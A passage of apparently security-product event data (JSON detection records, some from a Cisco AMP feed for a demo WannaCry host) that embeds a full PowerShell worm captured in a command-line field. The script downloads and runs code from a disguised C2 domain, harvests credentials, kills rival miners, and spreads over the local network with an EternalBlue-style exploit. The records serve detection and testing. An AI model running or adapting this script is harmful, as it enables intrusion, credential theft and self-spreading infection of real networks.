         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
